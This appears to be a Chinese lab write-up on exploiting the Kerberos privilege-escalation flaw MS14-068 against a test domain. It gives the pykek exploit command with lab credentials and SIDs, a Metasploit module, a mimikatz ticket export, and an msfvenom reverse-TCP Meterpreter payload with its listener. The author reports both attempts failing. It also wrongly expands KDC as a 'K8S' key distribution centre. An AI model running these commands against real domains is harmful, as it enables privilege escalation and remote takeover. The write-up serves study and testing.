2014年，微軟發布了一個緊急補丁，修復了Kerberos域用戶提權漏洞（MS14-068），所有的Windows服務器操作系統都受到該漏洞的影響。該漏洞允許攻擊者將域內任意用戶權限，提升到域管理員級別。如果想利用這個漏洞，把自己變成域控管理員，只需要知道：

• 域內任意用戶名
• SID
• 密碼
• 域控IP地址

反正我覺得這本書上，對這一塊講的不咋滴，至少我沒看到特權體現在哪？不知道大家怎么看？不過放心，這個知名的漏洞，肯定還會有后續的實驗的~

漏洞原理：

• 用戶向KDC（K8S秘鑰分發中心）申請TGT（身份憑證）時
• 用戶可以偽造自己的票據
• 如果票據聲明自己有域管理員權限
• 而KDC在處理該票據時未驗證票據的簽名
• 那么返回給用戶的TGT就擁有域管理員權限
• 用戶將有域管理員權限的TGT發送到TGS（票據授權服務）
• 就會獲得特權ST（服務票據）
• 于是可以訪問域內的一切資源

步驟一：查看域控制器的補丁

• 沒有KB3011780補丁
• 存在CVE-2014-6324（MS14-068漏洞）

步驟二：查看用戶的SID

• ailx32：SID=S-1-5-21-1632228486-913648825-264583114-1001
• Administrator：SID=S-1-5-21-1632228486-913648825-264583114-500

步驟三：克隆pykek

• 下載地址：github項目
• ms14-068.py是pykek工具包中的漏洞利用腳本

步驟四：生成高權限票據

• 普通域用戶名：ailx32
• 域：hackbiji.top
• 普通SID：S-1-5-21-1632228486-913648825-264583114-1001
• 域控IP： 192.168.160.143
• 普通賬號密碼：W2ngluoanquan

python ms14-068.py -u ailx32@hackbiji.top -s S-1-5-21-1632228486-913648825-264583114-1001 -d 192.168.160.143 -p W2ngluoanquan

步驟五：驗證權限

• 低權限的票據，無效

• 高權限票據，無效

• 最后結論就是，我票據確實導入了呀
• 但是它死活不能用普通身份獲得IPC通道

---

• 如果知道用戶名和密碼，那么是可以直接獲得IPC通道的呀
• 何必搞的那么復雜呢？

• 更可氣的是，我啥也沒干，通過管理員權限運行cmd，就已經拿到IPC權限了
• 蜜汁操作

---

后續實驗來了：抓緊時間收藏~

一、在metasploit中實驗

• 利用ms14-068漏洞
• 生成20200926141524_default_192.168.160.143_windows.kerberos_231623.bin
• 需要通過mimikatz進行一下格式轉換

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

二、在mimikatz中進行格式轉換

• 獲得kirbi格式的文件
• 留著后面提權用

kerberos::clist "20200926141524_default_192.168.160.143_windows.kerberos_231623.bin" /export

三、生成一個反向shell的木馬

• 獲得hack.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.140 LPORT=5555 -f exe > hack.exe

四、監聽木馬的來信

• 通過metasploit監聽5555端口

use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 5555

五、魚兒上鉤

• 獲得普通權限 hackbijiailx32

六、導入票據

• 狗屁，報錯（Kerberos ticket application failed.）
• 騙子

本篇完~

總結

以上是生活随笔為你收集整理的域控 批量导入 用户_kerberos域用户提权分析的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。